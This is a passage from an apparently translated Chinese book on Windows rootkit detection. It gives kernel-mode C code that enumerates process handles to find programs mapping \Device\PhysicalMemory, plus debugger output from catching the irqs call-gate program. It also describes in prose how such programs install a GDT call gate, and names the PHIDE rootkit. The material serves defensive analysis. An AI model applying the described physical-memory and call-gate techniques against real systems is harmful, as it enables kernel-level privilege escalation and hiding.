CLIENT_ID c; OBJECT_ATTRIBUTES o; ULONG returnLength,returnLength2,size=0; HANDLE hProcess,hDuplicateObject=NULL; POBJECT_TYPE_INFORMATION oti; POBJECT_BASIC_INFORMATION obi; NTSTATUS nt; DWORD*nameBuff=NULL; UNICODE_STRING ProcessName; BOOL objNameResolutionFail; c.UniqueProcess=pid; c.UniqueThread=0; o.Length=sizeof(OBJECT_ATTRIBUTES); InitializeObjectAttributes(&o,0,0,0,0); //open the process so we can duplicate its handle nt=ZwOpenProcess(&hProcess,PROCESS_DUP_HANDLE,&o,&c); if(nt!=STATUS_SUCCESS) { DbgPrint("\nGetHandleInfo():Error:ZwOpenProcess() failed on pid%d:%08X",pid,nt); (*otherFailCount)++; return FALSE; } //now duplicate the handle we wish to examine further nt=ZwDuplicateObject(hProcess, hObject, (HANDLE)0xFFFFFFFF, &hDuplicateObject, 0, 0, DUPLICATE_SAME_ACCESS); if(nt!=STATUS_SUCCESS||hDuplicateObject==NULL) { DbgPrint("\nGetHandleInfo():Error:ZwDuplicateObject() failed on pid%d:%08X",pid,nt); ZwClose(hProcess); (*otherFailCount)++; return FALSE; } //get object basic information obi=(POBJECT_BASIC_INFORMATION) ExAllocatePoolWithTag(NonPagedPool, sizeof(OBJECT_BASIC_INFORMATION), MY_TAG); nt=ZwQueryObject(hDuplicateObject, ObjectBasicInformation, obi, sizeof(OBJECT_BASIC_INFORMATION), &returnLength); if(nt!=STATUS_SUCCESS) { DbgPrint("\nGetHandleInfo():Error:ZwQueryObject()failed to get object basic information:%08X",nt); ZwClose(hDuplicateObject); ZwClose(hProcess); (*otherFailCount)++; return FALSE; } //get object type information oti=(POBJECT_TYPE_INFORMATION) ExAllocatePoolWithTag(NonPagedPool, obi->TypeInformationLength, MY_TAG); nt=ZwQueryObject(hDuplicateObject, ObjectTypeInformation, oti, obi->TypeInformationLength, &returnLength); //if there was a size mismatch problem,the variable returnLength //will have the required size if(nt==STATUS_INFO_LENGTH_MISMATCH) { //free the memory and reallocate at correct size ExFreePoolWithTag(oti,MY_TAG); oti=(POBJECT_TYPE_INFORMATION)ExAllocatePoolWithTag(NonPagedPool, returnLength,MY_TAG); nt=ZwQueryObject(hDuplicateObject, ObjectTypeInformation, oti, returnLength, &returnLength2); } //failed again?bail…… if(nt!=STATUS_SUCCESS) { DbgPrint("\nGetHandleInfo():Error:ZwQueryObject()failed to get object type information:%08X",nt); ExFreePoolWithTag(obi,MY_TAG); ExFreePoolWithTag(oti,MY_TAG); ZwClose(hDuplicateObject); ZwClose(hProcess); (*otherFailCount)++; return FALSE; } //get object NAME information nt=ZwQueryObject(hDuplicateObject, ObjectNameInformation, nameBuff, 0, &returnLength); //use the returnLength variable to reallocate an appropriately-sized buffer if(nt==STATUS_INFO_LENGTH_MISMATCH&&returnLength) { //allocate our second buffer with the correct size nameBuff=ExAllocatePoolWithTag(NonPagedPool,returnLength,MY_TAG); nt=ZwQueryObject(hDuplicateObject, ObjectNameInformation, nameBuff, returnLength, &returnLength2); objNameResolutionFail=FALSE; } else if(returnLength==0) { objNameResolutionFail=TRUE; } //if nameBuff is NULL,we failed to get name information above- //return FALSE even though //technically a valid object exists here,we don't know its name though. if(objNameResolutionFail) { ExFreePoolWithTag(obi,MY_TAG); ExFreePoolWithTag(oti,MY_TAG); ZwClose(hDuplicateObject); ZwClose(hProcess); (*nameFailCount)++; return FALSE; } else { RtlInitUnicodeString(ObjectName,(PWCHAR)nameBuff[1]); } ExFreePoolWithTag(obi,MY_TAG); ExFreePoolWithTag(oti,MY_TAG); ExFreePoolWithTag(nameBuff,MY_TAG); ZwClose(hDuplicateObject);ZwClose(hProcess); return TRUE; } 关于GetHandleInfo()函数还要注意一点,它在获取一个成功读取的句柄的名称时将会失败(我们的测试显示平均失败率大约为12%)。这有多种原因,比如权限不足(对象可能需要特殊的权限),对象没有名称,或者对象在我们完成请求之前被释放。这是尝试查询一组实时对象的副作用。前面已经提到过,更稳定的方法是注册一个回调例程,获得新对象的自动通知。注意,没有对象名称,我们的检测方法就会失败。 接下来,我们将说明如何使用这些检测代码来发现\\Device\PhysicalMemory对象的侵害,使用的实例是并不出名的irqs(http://www.codeproject.com/KB/system/soviet_kernel_hack.aspx)。这个实例在用户模式下安装一个调用门,然后试图通过这个调用门获得APIC中断信息。它通过将RAM的每个物理页面映射到自己的进程地址空间,搜索存储全局描述符表(GDT)的物理内存页面地址来安装调用门。找到该地址后,将一个调用门写入GDT中的新项目。然后可以使用调用门来收集APIC中断信息。 注意:我们的检测代码对其他恶意方法也有效,例如90210开发的PHIDE Rootkit(http://vx.netlux.org/vx.php?id=ep12),这个Rootkit使用\\Device\PhysicalMemory从用户模式安装一个调用门来提升权限并且隐藏进程和文件。 在未受感染的系统上我们的检测例程输出如下: DriverEntry():[0]Looking for processes with a handle open to\Device\PhysicalMemory.. FindPhysmemHandles():[0]Found 4514 handles. FindPhysmemHandles():Warning:666 name resolution failures and 0 other failures. FindPhysmemHandles():Found 0 open handles to\\Device\PhysicalMemory. DriverEntry():[0]Complete. 执行irqs程序之后,它使用未写入文档的函数NtMapViewOfSection()开始映射物理内存地址。这个进程密集而缓慢;因此,我们有大量的时间可以执行自己的检测实用程序(记住,目标进程必须维持一个指向\\Device\PhysicalMemory的句柄才会被发现)。下面的输出摘要展示了我们的检测工具在irqs程序运行时发现的打开句柄: ******************************************************************************* *A driver is mapping physical memory 001A9000->001A9FFF *that it does not own.This can cause internal CPU corruption. *A checked build will stop in the kernel debugger *so this problem can be fully debugged. ******************************************************************************* DriverEntry():[0]Looking for processes with a handle open to\\Device\PhysicalMemory.. FindPhysmemHandles():[0]Found 3724 handles. FindPhysmemHandles():Process 508 has a handle open to\\Device\PhysicalMemory!. FindPhysmemHandles():Warning:616 name resolution failures and 0 other failures. FindPhysmemHandles():Found 1 open handle to ******************************************************************************* \\Device\PhysicalMemory.DriverEntry():[0]Complete. *A driver is mapping physical memory 001AA000->001AAFFF *that it does not own.This can cause internal CPU corruption *A checked build will stop in the kernel debugger *so this problem can be fully debugged. ******************************************************************************* 从这个输出中,我们能够知道进程#508使用这个段对象。我们可以使用WinDbg的!process扩展命令并指定508的十六进制值(0x1fc),来验证这个进程的标识: kd>!process 0x1fc 7 Searching for Process with Cid==1fc Cid Handle table at e1003000 with 281 Entries in use PROCESS 81a1a468 SessionId:0 Cid:01fc Peb:7ffdf000 ParentCid:00dc DirBase:138a4000 ObjectTable:e1839188 HandleCount:29. Image:irqs.exe VadRoot 81a570f8 Vads 37 Clone 0 Private 57.Modified 0.Locked 0. DeviceMap e17e4520 Token e19ecd78 ElapsedTime 00:00:18.165 UserTime 00:00:00.030 KernelTime 00:00:10.064 QuotaPoolUsage[PagedPool]17252 QuotaPoolUsage[NonPagedPool]1480 Working Set Sizes(now,min,max)(278,50,345)(1112KB,200KB,1380KB) PeakWorkingSetSize 278 VirtualSize 15 Mb PeakVirtualSize 15 Mb PageFaultCount 275 MemoryPriority BACKGROUND BasePriority 8 CommitCharge 129 注意,星号包围的调试信息是内核发送的,指出irqs程序映射了它所不应该访问的核心内存。
standards